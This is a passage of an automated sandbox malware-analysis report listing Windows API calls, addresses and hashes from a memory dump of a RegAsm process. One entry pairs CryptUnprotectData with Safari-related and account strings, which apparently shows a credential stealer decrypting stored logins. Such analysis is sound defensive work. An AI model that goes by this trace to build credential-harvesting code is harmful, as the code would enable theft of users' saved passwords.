                                                                                                                                        • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                        • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                        • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                        • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                        • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                        • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                        • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                        • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                        • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                        • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                        • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                        • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                        • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                        APIs
                                                                                                                                        • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??3@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 613200358-0
                                                                                                                                        • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                        • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                        • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                        • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                        APIs
                                                                                                                                        • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                        • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                        • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                        • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                        APIs
                                                                                                                                        • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumNamesResource
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3334572018-0
                                                                                                                                        • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                        • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                        • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                        • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3664257935-0
                                                                                                                                        • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                        • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                        • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                        • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                        APIs
                                                                                                                                        • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFind
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                        • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                        • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                        • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                        • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Open
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 71445658-0
                                                                                                                                        • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                        • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                        • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                        • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                        • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                        • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                        • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                        • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                                                        • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                                                        • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 004095FC
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                          • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                          • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                          • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3655998216-0
                                                                                                                                        • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                        • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                                                        • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                                                        • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                                                        APIs
                                                                                                                                        • memset.MSVCRT ref: 00445426
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                          • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                          • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                          • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1828521557-0
                                                                                                                                        • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                        • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                                                        • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                                                        • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                          • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                        • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@FilePointermemcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 609303285-0
                                                                                                                                        • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                        • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                                                        • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                                                        • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsicmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2081463915-0
                                                                                                                                        • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                        • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                                                        • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                                                        • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2136311172-0
                                                                                                                                        • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                        • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                                                        • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                                                        • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ??2@??3@
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1936579350-0
                                                                                                                                        • Opcode ID: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                        • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                                                                        • Opcode Fuzzy Hash: c1d2223be94a68f833538aabce888aab0279aa93460cd9bacb51074fa57d6133
                                                                                                                                        • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                        • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                                                                        • Opcode Fuzzy Hash: 6cac8f1a699deb91221d7a6f108e22352180a1071cf07404188a59dfc78ebdbf
                                                                                                                                        • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                        • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                                                                        • Opcode Fuzzy Hash: 9f3c014d0cf6ef3ef7071a5cb6dd1d5584685ccd4eb021183226fc9c7d12a071
                                                                                                                                        • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                          • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                        • free.MSVCRT ref: 00418370
                                                                                                                                          • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                          • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                        • String ID: OsError 0x%x (%u)
                                                                                                                                        • API String ID: 2360000266-2664311388
                                                                                                                                        • Opcode ID: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                        • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                                                                                                        • Opcode Fuzzy Hash: 63f4947bb6e883e354d3d2ebf96ad5df6c46b6e8727c7c07250c00721f9c325d
                                                                                                                                        • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                                                                                                        APIs
                                                                                                                                        • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                        • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                        • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                        • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                          • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                          • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                        • memset.MSVCRT ref: 0040265F
                                                                                                                                        • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                          • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                          • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                        • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                        • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.383507367.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsicmp$Freememcpy$Library$CryptDataLocalUnprotectmemsetwcslen
                                                                                                                                        • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                        • API String ID: 2257402768-1134094380
                                                                                                                                        • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                        • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                        • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                                                                                                        • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                        • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                        • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0041407D
